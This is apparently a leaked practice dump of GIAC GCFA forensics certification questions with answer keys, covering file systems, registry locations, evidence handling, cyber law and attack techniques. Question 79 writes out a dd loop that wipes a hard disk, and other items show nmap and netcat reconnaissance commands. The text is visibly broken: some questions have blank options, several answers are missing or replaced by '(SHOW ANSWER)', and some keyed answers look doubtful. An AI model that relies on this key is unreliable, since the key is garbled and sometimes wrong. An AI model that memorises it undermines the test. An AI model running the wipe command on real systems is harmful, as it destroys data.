GIAC.GCFA.v2018-03-11.q309

Exam Code: GCFA
Exam Name: GIAC Certified Forensics Analyst
Certification Provider: GIAC
Free Question Number: 309
Version: v2018-03-11
https://www.freecram.com/torrent/GIAC.GCFA.v2018-03-11.q309.html

NEW QUESTION: 1
Which of the following statements is NOT true about the file slack spaces in Windows operating system?
A. File slack is the space, which exists between the end of the file and the end of the last cluster.
B. File slack may contain data from the memory of the system.
C. It is possible to find user names, passwords, and other important information in slack.
D. Large cluster size will decrease the volume of the file slack.
Answer: D

NEW QUESTION: 2
In which of the following files does the Linux operating system store passwords?
A. Passwd
B. SAM
C. Shadow
D. Password

NEW QUESTION: 3
Which of the following password cracking attacks is based on a pre-calculated hash table to retrieve plain text passwords?
A. Rainbow attack
B. Dictionary attack
C. Hybrid attack
D. Brute Force attack
Answer: A

NEW QUESTION: 4
You work as a Network Administrator for NetTech Inc. The company has a network that consists of 200 client computers and ten database servers. One morning, you find that an unauthorized user is accessing data on a database server on the network. Which of the following actions will you take to preserve the evidences? Each correct answer represents a complete solution. Choose three.
A. Preserve the log files for a forensics expert.
B. Prevent a forensics experts team from entering the server room.
C. Detach the network cable from the database server.
D. Prevent the company employees from entering the server room.
Answer: A,C,D

NEW QUESTION: 5
You work as the Network Administrator for McNeil Inc. The company has a Unix-based network. You want to set the hard disk geometry parameters, cylinders, heads, and sectors. Which of the following Unix commands can you use to accomplish the task?
A. mkswap
B. mke2fs
C. mkfs
D. hdparm
Answer: D

NEW QUESTION: 6
Which of the following statements about SD cards are true? Each correct answer represents a complete solution. Choose two.
A. It is used with mobile phones and digital cameras.
B. It is a type of non-volatile memory card.
C. It is a 184-pin memory module.
D. It is used as RAM on client computers and servers.

NEW QUESTION: 7
Which of the following Linux file systems is a journaled ?
A.
B.
C.
D. ext
Answer: B

NEW QUESTION: 8
Which of the following type of files is NOT deleted by Disk Cleanup program of Windows XP?
A. Temporary Internet Files
B. Temporary Setup Files
C. Old data files
D. Offline Files
Answer: C

NEW QUESTION: 9
What is the name of the group of blocks which contains information used by the operating system in Linux system?
A. logblock
B. Superblock
C. Systemblock
D. Bootblock

NEW QUESTION: 10
Which utility enables you to access files from a Windows .CAB file?
A. WINZIP.EXE
B. EXTRACT.EXE
C. ACCESS.EXE
D. XCOPY.EXE
Answer: B

NEW QUESTION: 11
Which of the following involves changing data prior to or during input to a computer in an effort to commit fraud?
A. Wiretapping
B. Eavesdropping
C. Data diddling
D. Spoofing
Answer: C

NEW QUESTION: 12
Which of the following log files are used to collect evidences before taking the bit-stream image of the BlackBerry? Each correct answer represents a complete solution. Choose all that apply.
A. Roam and Radio
B. Radio status
C. user history
D. Transmit/Receive

NEW QUESTION: 13
An attacker attempts to gain information about a network by specifically targeting the network resources and applications running on a computer. This method for gaining information is known as ______.
A. Notification
B. Enumeration
C. Passive response
D. Sensor
E. Footprinting
F. Scanning
Answer: B

NEW QUESTION: 14
Adam works as a professional Computer Hacking Forensic Investigator. A project has been assigned to him to investigate computer of an unfaithful employee of SecureEnet Inc. Suspect's computer runs on Windows operating system. Which of the following sources will Adam investigate on a Windows host to collect the electronic evidences? Each correct answer represents a complete solution. Choose all that apply.
A. Swap files
B. Unused and hidden partition
C. Allocated cluster
D. Slack spaces

NEW QUESTION: 15
Which of the following prevents malicious programs from attacking a system?
A. Anti-virus program
B. Biometric devices
C. Firewall
D. Smart cards
Answer: A

NEW QUESTION: 16
Which of the following laws enacted in United States makes it illegal for an Internet Service Provider (ISP) to allow child pornography to exist on Web sites?
A. Prosecutorial Remedies and Tools Against the Exploitation of Children Today Act (PROTECT Act)
B. Sexual Predators Act
C. Child Pornography Prevention Act (CPPA)
D. USA PATRIOT Act

NEW QUESTION: 17
Which of the following is the initiative of United States Department of Justice, which provides state and local law enforcement agencies the tools to prevent Internet crimes against children, and catches the distributors of child pornography on the Internet?
A. Anti-Child Porn.org (ACPO)
B. Internet Crimes Against Children (ICAC)
C. Project Safe Childhood (PSC)
D. Innocent Images National Initiative (IINI)
Answer: B

NEW QUESTION: 18
Which of the following is used to authenticate asymmetric keys?
A. Digital signature
B. Demilitarized zone (DMZ)
C. Password
D. MAC Address

NEW QUESTION: 19
Sandra, an expert computer user, hears five beeps while booting her computer that has AMI BIOS; and after that her computer stops responding. Sandra knows that during booting process POST produces different beep codes for different types of errors. Which of the following errors refers to this POST beep code?
A. Cache memory test failed
B. Display memory error
C. Mother board timer not operational
D. Processor failure
Answer: D

NEW QUESTION: 20
John works as a professional Ethical Hacker. He is assigned a project to test the security of www.weare-secure.com. He enters a single quote in the input field of the login page of the We-are-secure Web site and receives the following error message:
Microsoft OLE DB Provider for ODBC Drivers error '0x80040E14'
This error message shows that the We-are-secure Website is vulnerable to ______.
A. An XSS attack
B. A buffer overflow
C. A Denial-of-Service attack
D. A SQL injection attack

NEW QUESTION: 21
Which of the following steps should be performed in order to optimize a system performance? Each correct answer represents a complete solution. Choose three.
A. Delete the temporary files
B. Edit registry regularly
C. Run anti-spyware program regularly
D. Defragment the hard disk drive
Answer: A,C,D

NEW QUESTION: 22
Which of the following graphical tools is used to navigate through directory structures?
A. Windows Explorer
B. Disk Cleanup
C. Disk Management
D. System Information

NEW QUESTION: 23
You work as a professional Computer Hacking Forensic Investigator. A project has been assigned to you to investigate the DoS attack on a computer network of SecureEnet Inc. Which of the following methods will you perform to accomplish the task? Each correct answer represents a complete solution. Choose all that apply.
A. Sniff network traffic to the failing machine.
B. Seize all computers and transfer them to the Forensic lab.
C. Look for unusual traffic on Internet connections and network segments.
D. Look for core files or crash dumps on the affected systems.
Answer: A,C,D

NEW QUESTION: 24
Which two technologies should research groups use for secure VPN access while traveling? (Click the Exhibit button on the toolbar to see the case study.) Each correct answer represents a complete solution. Choose two.
A. PPTP
B. SSL
C. Smart cards
D. Kerberos authentication
E. (EFS)
Answer: A,C

NEW QUESTION: 25
A Web-based credit card company had collected financial and personal details of Mark before issuing him a credit card. The company has now provided Mark's financial and personal details to another company. Which of the following Internet laws has the credit card issuing company violated?
A. Security law
B. Trademark law
C. Copyright law
D. Privacy law

NEW QUESTION: 26
In which of the following security tests does the security testing team simulate as an employee or other person with an authorized connection to the organization's network?
A. Stolen equipment
B. Local network
C. Remote dial-up network
D. Remote network
Answer: B

NEW QUESTION: 27
Which of the following data is NOT listed as a volatile data in RFC 3227 list for Windows based system?
A. Data on a hard disk
B. Kernel statistics
C. Temporary file system
D. Routing table

NEW QUESTION: 28
Which of the following registry hives stores configuration information specific to a particular user who is currently logged on to the computer?
A. HKEY_USERS
B. HKEY_LOCAL_MACHINE
C. HKEY_CURRENT_USER
D. HKEY_CLASSES_ROOT
Answer: C

NEW QUESTION: 29
John works as a professional Ethical Hacker. He has been assigned a project to test the security of www.we-are-secure.com. He wants to test the effect of a virus on the We-are-secure server. He injects the virus on the server and, as a result, the server becomes infected with the virus even though an established antivirus program is installed on the server. Which of the following do you think are the reasons why the antivirus installed on the server did not detect the virus injected by John? Each correct answer represents a complete solution. Choose all that apply.
A. The mutation engine of the virus is generating a new encrypted code.
B. John has changed the signature of the virus.
C. John has created a new virus.
D. The virus, used by John, is not in the database of the antivirus program installed on the server.
Answer: A,B,C,D

NEW QUESTION: 30
Which of the following cryptographic methods are used in EnCase to ensure the integrity of the data, which is acquired for the investigation? Each correct answer represents a complete solution. Choose two.
A. MD5
B. CRC
C. Twofish
D. HAVAL
Answer: A,B

NEW QUESTION: 31
The Klez worm is a mass-mailing worm that exploits a vulnerability to open an executable attachment even in Microsoft Outlook's preview pane. The Klez worm gathers email addresses from the entries of the default Windows Address Book (WAB). Which of the following registry values can be used to identify this worm?
A. HKEY_CURRENT_USER\Software\Microsoft\WAB\WAB4\Wab File Name = "file and pathname of the WAB file"
B. HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
C. HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices
D. HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run


NEW QUESTION: 32
The promiscuous mode is a configuration of a network card that makes the card pass all traffic it receives to the central processing unit rather than just packets addressed to it. Which of the following tools works by placing the host system network card into the promiscuous mode?
A. Sniffer
B. NetStumbler
C. Snort
D. THC-Scan
Answer: A

NEW QUESTION: 33
On which of the following locations does the Windows NT/2000 operating system contain the SAM, SAM.LOG, SECURITY.LOG, APPLICATION.LOG, and EVENT.LOG files?
A. \%Systemroot%\system32\config
B. \%Systemroot%\system32
C. \%Systemroot%\help
D. \%Systemroot%\profiles
Answer: A

NEW QUESTION: 34
Every network device contains a unique built in Media Access Control (MAC) address, which is used to identify the authentic device to limit the network access. Which of the following addresses is a valid MAC address?
A. F936.28A1.5BCD.DEFA
B. 1011-0011-1010-1110-1100-0001
C. 132.298.1.23
D. A3-07-B9-E3-BC-F9

NEW QUESTION: 35
John works as a professional Ethical Hacker. He has been assigned the project of testing the security of www.we-are-secure.com. He traceroutes the We-are-secure server and gets the following result:

Considering the above traceroute result, which of the following statements can be true? Each correct answer represents a complete solution. Choose all that apply.
A. The We-are-secure server is using a packet filtering firewall.
B. Some router along the path is down.
C. While tracerouting, John's network connection has become slow.
D. The IP address of the We-are-secure server is not valid.
Answer: A,B,C

NEW QUESTION: 36
Mark works as a security manager for SofTech Inc. He is using a technique for monitoring what the employees are doing with corporate resources. Which of the following techniques is being used by Mark to gather evidence of an ongoing computer crime if a member of the staff is e-mailing company's secrets to an opponent?
A. Physical surveillance
B. Electronic surveillance
C. Civil investigation
D. Criminal investigation
Answer: B

NEW QUESTION: 37
Which of the following Windows Registry key contains the password file of the user?
A. HKEY_CURRENT_CONFIG
B. HKEY_DYN_DATA
C. HKEY_LOCAL_MACHINE
D. HKEY_USER
Answer: C

NEW QUESTION: 38
John works as a Network Security Professional. He is assigned a project to test the security of www.we-are-secure.com. He is working on the Linux operating system and wants to install an Intrusion Detection System on the We-are-secure server so that he can receive alerts about any hacking attempts. Which of the following tools can John use to accomplish the task? Each correct answer represents a complete solution. Choose all that apply.
A. Snort
B. Samhain
C. SARA
D. Tripwire
Answer: A,B

NEW QUESTION: 39
TCP FIN scanning is a type of stealth scanning through which the attacker sends a FIN packet to the target port. If the port is closed, the victim assumes that this packet was sent mistakenly by the attacker and sends the RST packet to the attacker. If the port is open, the FIN packet will be ignored and the port will drop the packet. Which of the following operating systems can be easily identified with the help of TCP FIN scanning?
A. Windows
B. Knoppix
C. Red Hat
D. Solaris
Answer: A

NEW QUESTION: 40
Which of the following wireless network standards operates on the 5 GHz band and transfers data at a rate of 54 Mbps?
A. 802.11b
B. 802.11u
C. 802.11a
D. 802.11g
Answer: C

NEW QUESTION: 41
Which of the following is used to detect the bad sectors in a hard disk under Linux environment?
A. ScanDisk
B. Badblocks
C. CHKDSK
D. CheckDisk
Answer: B

NEW QUESTION: 42
Which of the following file systems cannot be used to install an operating system on the hard disk drive? Each correct answer represents a complete solution. Choose two.
A. (NSS)
B. Compact Disc File System (CDFS)
C. Windows NT file system (NTFS)
D. Log-structured file system (LFS)
E. High Performance File System (HPFS)
Answer: B,D

NEW QUESTION: 43
John works as a contract Ethical Hacker. He has recently got a project to do security checking for www.we-are-secure.com. He wants to find out the operating system of the we-are-secure server in the information gathering step. Which of the following commands will he use to accomplish the task? Each correct answer represents a complete solution. Choose two.
A. nc 208.100.2.25 23
B. nmap -v -O www.we-are-secure.com
C. nc -v -n 208.100.2.25 80
D. nmap -v -O 208.100.2.25
Answer: B,D

NEW QUESTION: 44
You work as a Network Administrator for Perfect Solutions Inc. The company has a Linux-based network. You are creating a user account by using the USERADD command. Which of the following entries cannot be used for specifying a user ID? Each correct answer represents a complete solution. Choose all that apply.
A. 99
B. -1
C. 100
D. 0
Answer: A,B,D

NEW QUESTION: 45
Which of the following commands is used to enforce checking of a file system even if the file system seems to be clean?
A. e2fsck -b
B. e2fsck -c
C. e2fsck -p
D. e2fsck -f

NEW QUESTION: 46
Which of the following standard technologies is not used to interface hard disk with the computer?
A. SCSI
B. USB
C. PS/2
D. IDE/ATA


NEW QUESTION: 47
Which of the following is the correct order of digital investigations Standard Operating Procedure (SOP)?
A. Initial analysis, request for service, data collection, data analysis, data reporting
B. Request for service, initial analysis, data collection, data analysis, data reporting
C. Initial analysis, request for service, data collection, data reporting, data analysis
D. Request for service, initial analysis, data collection, data reporting, data analysis

NEW QUESTION: 48
John used to work as a Network Administrator for We-are-secure Inc. Now he has resigned from the company for personal reasons. He wants to send out some secret information of the company. To do so, he takes an image file and simply uses a tool image hide and embeds the secret file within an image file of the famous actress, Jennifer Lopez, and sends it to his Yahoo mail id. Since he is using the image file to send the data, the mail server of his company is unable to filter this mail. Which of the following techniques is he performing to accomplish his task?
A. Steganography
B. Web ripping
C. Social engineering
D. Email spoofing

NEW QUESTION: 49
Which of the following articles defines illegal access to the computer or network in Chapter 2 of Section 1, i.e., Substantive criminal law of the Convention on Cybercrime passed by the Council of Europe?
A. Article 5
B. Article 16
C. Article 3
D. Article 2
Answer: D

NEW QUESTION: 50
Adam works as a professional Computer Hacking Forensic Investigator. He has been assigned with the project of investigating an iPod, which is suspected to contain some explicit material. Adam wants to connect the compromised iPod to his system, which is running on Windows XP (SP2) operating system. He doubts that connecting the iPod with his computer may change some evidences and settings in the iPod. He wants to set the iPod to read-only mode. This can be done by changing the registry key within the Windows XP (SP2) operating system. Which of the following registry keys will Adam change to accomplish the task?
A. HKEY_LOCAL_MACHINE\System\CurrentControlset\StorageDevicePolicies
B. HKEY_LOCAL_MACHINE\System\CurrentControlset\Control\StorageDevicePolicies
C. HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion
D. HKEY_LOCAL_MACHINE\CurrentControlset\Control\StorageDevicePolicies
Answer: B

NEW QUESTION: 51
Which of the following laws or acts, formed in Australia, enforces prohibition against cyber stalking?
A. Stalking Amendment Act (1999)
B. Malicious Communications Act (1998)
C. Stalking by Electronic Communications Act (2001)
D. Anti-Cyber-Stalking law (1999)

NEW QUESTION: 52
Which of the following tools are used to determine the hop counts of an IP packet? Each correct answer represents a complete solution. Choose two.
A. Ping
B. Netstat
C. IPCONFIG
D. TRACERT
Answer: A,D

NEW QUESTION: 53
Maria works as a professional Ethical Hacker. She recently got a project to test the security of www.we-are-secure.com. Arrange the three pre-test phases of the attack to test the security of weare-secure. Select and Place:

Answer:

NEW QUESTION: 54
Which of the following is a formula, practice, process, design, instrument, pattern, or compilation of information which is not generally known, but by which a business can obtain an economic advantage over its competitors?
A. Copyright
B. Utility model
C. Cookie
D. Trade secret
Answer: D

NEW QUESTION: 55
This type of virus infects programs that can execute and load into memory to perform predefined steps for infecting systems. It infects files with the extensions .EXE, .COM, .BIN, and .SYS. As it can replicate or destroy these types of files, the operating system becomes corrupted and needs reinstallation. This type of virus is known as ______.
A. File virus
B. Multipartite virus
C. Polymorphic virus
D. Stealth virus
E. Boot sector virus

NEW QUESTION: 56
Adam works as a professional Computer Hacking Forensic Investigator. He works with the local police. A project has been assigned to him to investigate an iPod, which was seized from a student of the high school. It is suspected that the explicit child pornography contents are stored in the iPod. Adam wants to investigate the iPod extensively. Which of the following operating systems will Adam use to carry out his investigations in more extensive and elaborate manner?
A. Linux
B. Mac OS
C. MINIX 3
D. Windows XP
Answer: B

NEW QUESTION: 57
Rick works as a Network Administrator for uCertify Inc. He takes a backup of some important compressed files on an NTFS partition, using the Windows 2000 Backup utility. Rick restores these files in a FAT32 partition. He finds that the restored files do not have the compression attribute. What is the most likely cause?
A. The Windows 2000 Backup utility decompresses compressed files while taking a backup.
B. A FAT32 partition does not support compression.
C. The backup of files that are saved on an NTFS partition cannot be restored in a FAT32 partition.
D. The FAT32 partition is corrupt and requires to be reformatted.
Answer: B

NEW QUESTION: 58
Which of the following file systems contains hardware settings of a Linux computer?
A. /var
B. /home
C. /proc
D. /etc
Answer: C

NEW QUESTION: 59
Which of the following file systems provides file-level security?
A. CDFS
B. NTFS
C. FAT
D. FAT32

NEW QUESTION: 60
Trinity wants to send an email to her friend. She uses the MD5 generator to calculate cryptographic hash of her email to ensure the security and integrity of the email. MD5 generator, which Trinity is using operates in two steps:
Creates check file
Verifies the check file
Which of the following MD5 generators is Trinity using?
A. Mat-MD5
B. Chaos MD5
C. MD5 Checksum Verifier
D. Secure Hash Signature Generator
Answer: C

NEW QUESTION: 61
You work as a Network Administrator for Tech Perfect Inc. The company has a Linux-based network. Users complain that they are unable to access resources on the network. However, there was no such problem the previous day. They are receiving the following error messages regularly:
Unable to resolve host name
As your primary step for resolving the issue, which of the following services will you verify whether it is running or not?
A. APACHE
B. BIND
C. SAMBA
D. SQUID
Answer: B

NEW QUESTION: 62
A customer comes to you stating that his hard drive has crashed. He had backed up the hard drive, but some files on it were encrypted with Windows Encrypted File System (EFS). What do you need to do to be able to give him access to those restored encrypted files?
A. You need the encryption key. If that was not saved/backed up, then there is no chance of recovery.
B. Nothing, they are unrecoverable.
C. You need to make sure that when you restore, you give the new machine the same user account so that he can open the encrypted files.
D. Nothing, when you restore, he will have access.
Answer: A

NEW QUESTION: 63
You work as a Web developer for ABC Inc. You want to investigate the Cross-Site Scripting attack on your company's Web site. Which of the following methods of investigation can you use to accomplish the task? Each correct answer represents a complete solution. Choose all that apply.
A. Use Wireshark to capture traffic going to the server and then searching for the requests going to the input page, which may give log of the malicious traffic and the IP address of the source.
B. Look at the Web server's logs and normal traffic logging.
C. Review the source of any HTML-formatted e-mail messages for embedded scripts or links in the URL to the company's site.
D. Use a Web proxy to view the Web server transactions in real time and investigate any communication with outside servers.
Answer: B,C,D

NEW QUESTION: 64
Which of the following refers to the ability to ensure that the data is not modified or tampered with?
A. Non-repudiation
B. Integrity
C. Confidentiality
D. Availability
Answer: B

NEW QUESTION: 65
Which of the following directories contains administrative commands and daemon processes in the Linux operating system?
A. /sbin
B. /usr
C. /etc
D. /dev
Answer: A

NEW QUESTION: 66
Which of the following file systems supports disk quotas?
A. NTFS
B. FAT
C. FAT32
D. CDFS
Answer: A

NEW QUESTION: 67
SIMULATION
Fill in the blank with the appropriate file system. Alternate Data Streams (ADS) is a feature of the _____ file system, which allows more than one data stream to be associated with a filename.
Answer: NTFS

NEW QUESTION: 68
Which of the following types of attack can guess a hashed password?
A. Evasion attack
B. Denial of Service attack
C. Brute force attack
D. Teardrop attack

NEW QUESTION: 69
Victor works as a professional Ethical Hacker for SecureEnet Inc. He has been assigned a job to test an image, in which some secret information is hidden, using Steganography. Victor performs the following techniques to accomplish the task:
1. Smoothening and decreasing contrast by averaging the pixels of the area where significant color transitions occur.
2. Reducing noise by adjusting color and averaging pixel value.
3. Sharpening, Rotating, Resampling, and Softening the image.
Which of the following Steganography attacks is Victor using?
A. Active Attacks
B. Steg-Only Attack
C. Chosen-Stego Attack
D. Stegdetect Attack
Answer: A

NEW QUESTION: 70
Adam works as a Security Administrator for Umbrella Inc. He is responsible for securing all 15 servers of the company. To successfully accomplish the task, he enables the hardware and software firewalls and disables all unnecessary services on all the servers. Sales manager of the company asks Adam to run emulation software on one of the servers that requires the telnet service to function properly. Adam is concerned about the security of the server, as telnet can be a very large security risk in an organization. Adam decides to perform some footprinting, scanning, and penetration testing on the server to check the security. Adam telnets into the server and writes the following command:
HEAD / HTTP/1.0
After pressing enter twice, Adam gets the following results:

Which of the following tasks has Adam just accomplished?
A. Submitted a remote command to crash the server.
B. Grabbed the banner.
C. Downloaded a file to his local computer.
D. Poisoned the local DNS cache of the server.
Answer: B

NEW QUESTION: 71
Mark works as a Network administrator for SecureEnet Inc. His system runs on Mac OS X. He wants to boot his system from the Network Interface Controller (NIC). Which of the following snag keys will Mark use to perform the required function?
A. C
B. Z
C. N
D. D
Answer: C

NEW QUESTION: 72
Which of the following file systems provides integrated security?
A. CDFS
B. HPFS
C. FAT32
D. EFS
Answer: D

NEW QUESTION: 73
Adam works as a Security Administrator for Umbrella Technology Inc. He reported a breach in security to his senior members, stating that "security defenses have been breached and exploited for 2 weeks by hackers." The hackers had accessed and downloaded 50,000 addresses containing customer credit cards and passwords. Umbrella Technology was looking to law enforcement officials to protect their intellectual property. The intruder entered through an employee's home machine, which was connected to Umbrella Technology's corporate VPN network. The application called BEAST Trojan was used in the attack to open a "back door" allowing the hackers undetected access. The security breach was discovered when customers complained about the usage of their credit cards without their knowledge. The hackers were traced back to Shanghai, China through e-mail address evidence. The credit card information was sent to that same e-mail address. The passwords allowed the hackers to access Umbrella Technology's network from a remote location, posing as employees. Which of the following actions can Adam perform to prevent such attacks from occurring in future?
A. Disable VPN access to all employees of the company from home machines
B. Allow VPN access but replace the standard authentication with biometric authentication.
C. Replace the VPN access with dial-up modem access to the company's network.
D. Apply different security policy to make passwords of employees more complex.
Answer: A

NEW QUESTION: 74
Which of the following tools can be used to perform a whois query? Each correct answer represents a complete solution. Choose all that apply.
A. WsPingPro
B. SuperScan
C. Traceroute
D. Sam Spade
Answer: A,B,D

NEW QUESTION: 75
Which of the following sections of an investigative report covers the background and summary of the report including the outcome of the case and the list of allegations?
A. Section 4
B. Section 3
C. Section 2
D. Section 1
Answer: C

NEW QUESTION: 76
John works for an Internet Service Provider (ISP) in the United States. He discovered child pornography material on a Web site hosted by the ISP. John immediately informed law enforcement authorities about this issue. Under which of the following Acts is John bound to take such an action?
A. Civil Rights Act of 1991
B. Civil Rights Act of 1964
C. Sexual Predators Act
D. PROTECT Act
Answer: C


NEW QUESTION: 77 Sam works as a professional Computer Hacking Forensic Investigator. A project has been assigned to him to investigate a compromised system, which runs on Linux operating system. Sam wants to investigate and review local software, system libraries, and other application installed on the system. Which of the following directories in Linux will he review to accomplish the task? A. /tmp B. /lib C. /mnt D. /sbin Answer: (SHOW ANSWER)

NEW QUESTION: 78 An organization wants to mitigate the risks associated with the lost or stolen laptops and the associated disclosure laws, while reporting data breaches. Which of the following solutions will be best for the organization? A. Whole disk encryption B. Hashing function C. Digital signature D. Trusted Platform Module Answer: (SHOW ANSWER)

NEW QUESTION: 79 Adam, a malicious hacker, has successfully gained unauthorized access to the Linux system of Umbrella Inc. The Web server of the company runs on Apache. He has downloaded sensitive documents and database files from the computer. After performing these malicious tasks, Adam finally runs the following command on the Linux command box before disconnecting:

for (( i = 0;i<11;i++ )); do
dd if=/dev/random of=/dev/hda && dd if=/dev/zero of=/dev/hda
done

Which of the following actions does Adam want to perform by the above command? A. Infecting the hard disk with polymorphic virus strings. B. Wiping the contents of the hard disk with zeros. C. Making a bit stream copy of the entire hard disk for later download. D. Deleting all log files present on the system. Answer: B (LEAVE A REPLY)

NEW QUESTION: 80 Which of the following provides high availability of data? A. Anti-virus software B. Backup C. EFS D. RAID Answer: (SHOW ANSWER)

NEW QUESTION: 81 You are responsible for maintaining and troubleshooting PCs at your company. The receptionist reports her screen has gone blue. When you get there you notice the 'blue screen of death' with an error message NTFS_FILE_SYSTEM. What is the most likely cause of this error? A. Windows was installed improperly. B. A virus C. Get the latest patch for Windows. D. The hard disk is corrupt Answer: (SHOW ANSWER)

NEW QUESTION: 82 Which of the following files starts the initialization process in booting sequence of the Linux operating system? A. /etc/rc/rc.sysinit B. /etc/rc/rc.local C. /etc/sbin/init D. /etc/inittab Answer: C (LEAVE A REPLY)

NEW QUESTION: 83 In the United States, Title VII of the 1964 Civil Rights Act was formulated to protect an employee from discrimination on the basis of religion, color, race, national origin, and sex. This law makes discrimination in employment illegal. Which of the following was the original emphasis of the Act? A. Protect woman in the workplace B. Equal position to all employees C. Protect fundamental rights of an employee D. Prevent child pornography Answer: A (LEAVE A REPLY)

NEW QUESTION: 84 Which of the following tools is a wireless sniffer and analyzer that works on the Windows operating system? A. Kismet B. Aeropeek C. Void11 D. Airsnort Answer: (SHOW ANSWER)

NEW QUESTION: 85 Which of the following types of evidence proves or disproves a specific act through oral testimony based on information gathered through the witness's five senses? A. Hearsay evidence B. Direct evidence C. Conclusive evidence D. Best evidence Answer: (SHOW ANSWER)

NEW QUESTION: 86 Which of the following encryption methods use the RC4 technology? Each correct answer represents a complete solution. Choose all that apply. A. CCMP B. TKIP C. Dynamic WEP D. Static WEP Answer: (SHOW ANSWER)

NEW QUESTION: 87 Mark is taking a data backup during non-working hours from a remote computer on the network by using the Backup utility. What will he do to ensure that the backup has no errors? A. Take a full backup. B. Take an incremental backup. C. Log off all the users from the network. D. Verify the backup. Answer: D (LEAVE A REPLY)

NEW QUESTION: 88 Which of the following statements are true about routers? Each correct answer represents a complete solution. Choose all that apply. A. Routers organize addresses into classes, which are used to determine how to move packets from one network to another. B. Routers do not limit physical broadcast traffic. C. Routers act as protocol translators and bind dissimilar networks. D. Routers are responsible for making decisions about which of several paths network (or Internet) traffic will follow. Answer: A,C,D (LEAVE A REPLY)

NEW QUESTION: 89 Sarah has created a site on which she publishes a copyrighted material. She is ignorant that she is infringing copyright. Is she guilty under copyright laws? A. No B. Yes Answer: B (LEAVE A REPLY)

NEW QUESTION: 90 The incident response team has turned the evidence over to the forensic team. Now, it is the time to begin looking for the ways to improve the incident response process for next time. What are the typical areas for improvement? Each correct answer represents a complete solution. Choose all that apply. A. Electronic monitoring statement B. Incident response plan C. Additional personnel security controls D. Information dissemination policy Answer: A,B,C,D (LEAVE A REPLY)

NEW QUESTION: 91 Adam works as a Computer Hacking Forensic Investigator in a law firm. He has been assigned with his first project. Adam collected all required evidences and clues. He is now required to write an investigative report to present before court for further prosecution of the case. He needs guidelines to write an investigative report for expressing an opinion. Which of the following are the guidelines to write an investigative report in an efficient way? Each correct answer represents a complete solution. Choose all that apply. A. There should not be any assumptions made about any facts while writing the investigative report. B. The investigative report should be understandable by any reader. C. Opinion of a lay witness should be included in the investigative report. D. All ideas present in the investigative report should flow logically from facts to conclusions. Answer: A,B,D (LEAVE A REPLY)


NEW QUESTION: 92 Which of the following switches of the XCOPY command copies attributes while copying files? A. /s B. /p C. /o D. /k Answer: (SHOW ANSWER)

NEW QUESTION: 93 Which of the following precautionary steps are taken by the supervisors or employers to avoid sexual harassment in workplace? Each correct answer represents a complete solution. Choose all that apply. A. Contact the police and take legal action. B. Communicate to an employee who is indulging in such behavior. C. Immediately take action on the complaint. D. Establish a complaint mechanism. Answer: B,C,D (LEAVE A REPLY)

NEW QUESTION: 94 You want to change the attribute of a file named ACE.TXT to Hidden. Which command line will enable you to set the attribute? A. ATTRIB ACE.TXT /HR B. ATTRIB ACE.TXT +H C. ATTRIB ACE.TXT /H D. ATTRIB ACE.TXT -H Answer: B (LEAVE A REPLY)

NEW QUESTION: 95 Which of the following diagnostic codes sent by POST to the internal port h80 refers to the system board error? A. 200 to 299 B. 400 to 499 C. 300 to 399 D. 100 to 199 Answer: (SHOW ANSWER)

NEW QUESTION: 96 You work as a Network Administrator for Peach Tree Inc. The company currently has a FAT-based Windows NT network. All client computers run Windows 98. The management wants all client computers to be able to boot in Windows XP Professional. You want to accomplish the following goals: The file system should support file compression and file level security. All the existing data and files can be used by the new file system. Users should be able to dual-boot their computers. You take the following steps to accomplish these goals: Convert the FAT file system to NTFS using the CONVERT utility. Install Windows XP and choose to upgrade the existing operating system during setup. Which of the following goals will you be able to accomplish? Each correct answer represents a complete solution. Choose all that apply. A. Users are able to dual-boot their computers. B. All the existing data and files can be used by the new file system. C. The file system supports file compression and file level security. D. None of the goals are accomplished. Answer: (SHOW ANSWER)

NEW QUESTION: 97 Which of the following statements is true for a file in the UNIX operating system? A. It is a collection of information, which cannot be data or documents. B. It is a directory entry that points to an original file somewhere else. C. It is a collection of information, which can be data, an application, or documents. D. It is a collection of information, which can be only documents. Answer: C (LEAVE A REPLY)

NEW QUESTION: 98 The MBR of a hard disk is a collection of boot records that contain disk information such as disk architecture, cluster size, and so on. The main work of the MBR is to locate and run necessary operating system files that are required to run a hard disk. In the context of the operating system, MBR is also known as the boot loader. Which of the following viruses can infect the MBR of a hard disk? Each correct answer represents a complete solution. Choose two. A. Multipartite B. Stealth C. File D. Boot sector Answer: A,D (LEAVE A REPLY)

NEW QUESTION: 99 Which of the following protocols allows computers on different operating systems to share files and disk storage? A. Trivial File Transfer Protocol (TFTP) B. Domain Name System (DNS) C. (NFS) D. Simple Network Management Protocol (SNMP) Answer: C (LEAVE A REPLY)

NEW QUESTION: 100 Which of the following is the process of overwriting all addressable locations on a disk? A. Sanitization B. Spoofing C. Drive wiping D. Authentication Answer: (SHOW ANSWER)

NEW QUESTION: 101 Which of the following U.S. Federal laws addresses computer crime activities in communication lines, stations, or systems? A. 18 U.S.C. 2701 B. 18 U.S.C. 1029 C. 18 U.S.C. 1362 D. 18 U.S.C. 2510 E. 18 U.S.C. 1030 Answer: C (LEAVE A REPLY)

NEW QUESTION: 102 Which of the following is a file management tool? A. Device Manager B. Defrag C. MSCONFIG D. Windows Explorer Answer: D (LEAVE A REPLY)

NEW QUESTION: 103 Which status is a problem, assigned when its cause has been recognized? A. Work-around B. Incident C. Request for Change D. Known Error Answer: D (LEAVE A REPLY)

NEW QUESTION: 104 Which of the following tools can be used by a user to hide his identity? Each correct answer represents a complete solution. Choose all that apply. A. Rootkit B. War dialer C. Anonymizer D. Proxy server E. IPchains Answer: C,D,E (LEAVE A REPLY)

NEW QUESTION: 105 Which of the following tools can be used to perform tasks such as Windows password cracking, Windows enumeration, and VoIP session sniffing? A. Cain B. L0phtcrack C. John the Ripper D. Obiwan Answer: (SHOW ANSWER)

NEW QUESTION: 106 When you start your computer, Windows operating system reports that the hard disk drive has bad sectors. What will be your first step in resolving this issue? A. Run the FORMAT command from DOS prompt. B. Run DEFRAG on the hard drive. C. Run SCANDISK with the Thorough option. D. Replace the data cable of the hard disk drive. Answer: C (LEAVE A REPLY)


NEW QUESTION: 107 Which of the following steps are generally followed in computer forensic examinations? Each correct answer represents a complete solution. Choose three. A. Acquire B. Analyze C. Authenticate D. Encrypt Answer: A,B,C (LEAVE A REPLY)

